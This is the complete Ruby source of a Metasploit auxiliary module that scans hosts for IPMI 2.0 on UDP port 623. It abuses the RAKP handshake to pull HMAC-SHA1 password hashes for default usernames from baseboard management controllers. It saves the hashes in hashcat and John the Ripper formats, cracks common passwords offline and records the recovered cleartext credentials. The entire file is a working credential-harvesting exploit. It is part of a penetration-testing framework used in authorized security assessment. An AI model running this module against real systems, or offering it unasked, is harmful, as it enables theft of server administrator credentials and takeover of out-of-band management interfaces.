##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


require 'msf/core'
require 'rex/proto/ipmi'

class Metasploit3 < Msf::Auxiliary

  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'IPMI 2.0 RAKP Remote SHA1 Password Hash Retreival',
      'Description' => %q|
        This module identifies IPMI 2.0 compatible systems and attempts to retrieve the
        HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a
        file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb
        in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.
        |,
      'Author'      => [ 'Dan Farmer <zen[at]fish2.com>', 'hdm' ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['URL', 'http://fish2.com/ipmi/remote-pw-cracking.html']
        ],
      'DisclosureDate' => 'Jun 20 2013'
    )

    register_options(
    [
      Opt::RPORT(623),
      OptPath.new('USER_FILE', [ true, "File containing usernames, one per line",
        File.join(Msf::Config.install_root, 'data', 'wordlists', 'ipmi_users.txt')
      ]),
      OptPath.new('PASS_FILE', [ true, "File containing common passwords for offline cracking, one per line",
        File.join(Msf::Config.install_root, 'data', 'wordlists', 'ipmi_passwords.txt')
      ]),
      OptString.new('OUTPUT_HASHCAT_FILE', [false, "Save captured password hashes in hashcat format"]),
      OptString.new('OUTPUT_JOHN_FILE', [false, "Save captured password hashes in john the ripper format"]),
      OptBool.new('CRACK_COMMON', [true, "Automatically crack common passwords as they are obtained", true])
    ], self.class)

  end

  def run_host(ip)

    vprint_status("#{ip}:#{rport} - IPMI - Sending IPMI probes")

    usernames = []
    passwords = []

    # Load up our username list (save on open fds)
    ::File.open(datastore['USER_FILE'], "rb") do |fd|
      fd.each_line do |line|
        usernames << line.strip
      end
    end
    usernames << ""
    usernames = usernames.uniq

    # Load up our password list (save on open fds)
    ::File.open(datastore['PASS_FILE'], "rb") do |fd|
      fd.each_line do |line|
        passwords << line.gsub(/\r?\n?/, '')
      end
    end
    passwords << ""
    passwords = passwords.uniq


    self.udp_sock = Rex::Socket::Udp.create({'Context' => {'Msf' => framework, 'MsfExploit' => self}})
    add_socket(self.udp_sock)

    reported_vuln = false

    usernames.each do |username|
      console_session_id = Rex::Text.rand_text(4)
      console_random_id  = Rex::Text.rand_text(16)

      vprint_status("#{rhost}:#{rport} - IPMI - Trying username '#{username}'...")

      rakp = nil
      sess = nil

      # It may take multiple tries to get a working "session" on certain BMCs (HP iLO 4, etc)
      1.upto(5) do |attempt|

        r = nil
        1.upto(3) do
          udp_send(Rex::Proto::IPMI::Utils.create_ipmi_session_open_request(console_session_id))
          r = udp_recv(5.0)
          break if r
        end

        unless r
          vprint_status("#{rhost}:#{rport} - IPMI - No response to IPMI open session request")
          rakp = nil
          break
        end

        sess = process_opensession_reply(*r)
        unless sess
          vprint_status("#{rhost}:#{rport} - IPMI - Could not understand the response to the open session request")
          rakp = nil
          break
        end

        r = nil
        1.upto(3) do
          udp_send(Rex::Proto::IPMI::Utils.create_ipmi_rakp_1(sess.bmc_session_id, console_random_id, username))
          r = udp_recv(5.0)
          break if r
        end

        unless r
          vprint_status("#{rhost}:#{rport} - IPMI - No response to RAKP1 message")
          next
        end

        rakp = process_rakp1_reply(*r)
        unless rakp
          vprint_status("#{rhost}:#{rport} - IPMI - Could not understand the response to the RAKP1 request")
          rakp = nil
          break
        end

        # Sleep and retry on session ID errors
        if rakp.error_code == 2
          vprint_error("#{rhost}:#{rport} - IPMI - Returned a Session ID error for username #{username} on attempt #{attempt}")
          Rex.sleep(1)
          next
        end

        if rakp.error_code != 0
          vprint_error("#{rhost}:#{rport} - IPMI - Returned error code #{rakp.error_code} for username #{username}: #{Rex::Proto::IPMI::RMCP_ERRORS[rakp.error_code].to_s}")
          rakp = nil
          break
        end

        # TODO: Finish documenting this error field
        if rakp.ignored1 != 0
          vprint_error("#{rhost}:#{rport} - IPMI - Returned error code #{rakp.ignored1} for username #{username}")
          rakp = nil
          break
        end

        # Break out of the session retry code if we make it here
        break
      end

      # Skip to the next user if we didnt get a valid response
      next if not rakp

      # Calculate the salt used in the hmac-sha1 hash
      hmac_buffer = Rex::Proto::IPMI::Utils.create_rakp_hmac_sha1_salt(
        console_session_id,
        sess.bmc_session_id,
        console_random_id,
        rakp.bmc_random_id,
        rakp.bmc_guid,
        0x14,
        username
      )

      sha1_salt = hmac_buffer.unpack("H*")[0]
      sha1_hash = rakp.hmac_sha1.unpack("H*")[0]

      if sha1_hash == "0000000000000000000000000000000000000000"
        vprint_error("#{rhost}:#{rport} - IPMI - Returned a bogus SHA1 hash for username #{username}")
        next
      end

      found = "#{rhost}:#{rport} - IPMI - Hash found: #{username}:#{sha1_salt}:#{sha1_hash}"
      print_good(found)

      write_output_files(rhost, username, sha1_salt, sha1_hash)

      # Write the rakp hash to the database
      report_auth_info(
        :host	=> rhost,
        :port   => rport,
        :proto  => 'udp',
        :sname	=> 'ipmi',
        :user 	=> username,
        :pass   => "#{sha1_salt}:#{sha1_hash}",
        :source_type => "captured",
        :active => true,
        :type   => 'rakp_hmac_sha1_hash'
      )

      # Write the vulnerability to the database
      unless reported_vuln
        report_vuln(
          :host  => rhost,
          :port  => rport,
          :proto => 'udp',
          :sname => 'ipmi',
          :name  => 'IPMI 2.0 RMCP+ Authentication Password Hash Exposure',
          :info  => "Obtained password hash for user #{username}: #{sha1_salt}:#{sha1_hash}",
          :refs  => self.references
        )
        reported_vuln = true
      end

      # Offline crack common passwords and report clear-text credentials
      next unless datastore['CRACK_COMMON']

      passwords.uniq.each do |pass|
        pass = pass.strip
        next unless pass.length > 0
        next unless Rex::Proto::IPMI::Utils.verify_rakp_hmac_sha1(hmac_buffer, rakp.hmac_sha1, pass)
        print_good("#{rhost}:#{rport} - IPMI - Hash for user '#{username}' matches password '#{pass}'")

        # Report the clear-text credential to the database
        report_auth_info(
          :host	=> rhost,
          :port   => rport,
          :proto  => 'udp',
          :sname	=> 'ipmi',
          :user 	=> username,
          :pass   => pass,
          :source_type => "cracked",
          :active => true,
          :type   => 'password'
        )
        break
      end
    end
  end

  def process_opensession_reply(data, shost, sport)
    shost = shost.sub(/^::ffff:/, '')
    info = Rex::Proto::IPMI::Open_Session_Reply.new(data) rescue nil
    return if not info
    return if not info.session_payload_type == Rex::Proto::IPMI::PAYLOAD_RMCPPLUSOPEN_REP
    info
  end

  def process_rakp1_reply(data, shost, sport)
    shost = shost.sub(/^::ffff:/, '')
    info = Rex::Proto::IPMI::RAKP2.new(data) rescue nil
    return if not info
    return if not info.session_payload_type == Rex::Proto::IPMI::PAYLOAD_RAKP2
    info
  end


  def write_output_files(rhost, username, sha1_salt, sha1_hash)
    if datastore['OUTPUT_HASHCAT_FILE']
      ::File.open(datastore['OUTPUT_HASHCAT_FILE'], "ab") do |fd|
        fd.write("#{rhost} #{username}:#{sha1_salt}:#{sha1_hash}\n")
        fd.flush
      end
    end

    if datastore['OUTPUT_JOHN_FILE']
      ::File.open(datastore['OUTPUT_JOHN_FILE'], "ab") do |fd|
        fd.write("#{rhost} #{username}:$rakp$#{sha1_salt}$#{sha1_hash}\n")
        fd.flush
      end
    end
  end

  #
  # Helper methods (these didn't quite fit with existing mixins)
  #

  attr_accessor :udp_sock

  def udp_send(data)
    begin
      udp_sock.sendto(data, rhost, datastore['RPORT'], 0)
    rescue ::Interrupt
      raise $!
    rescue ::Exception
    end
  end

  def udp_recv(timeo)
    r = udp_sock.recvfrom(65535, timeo)
    r[1] ? r : nil
  end

  def rhost
    datastore['RHOST']
  end

  def rport
    datastore['RPORT']
  end

end
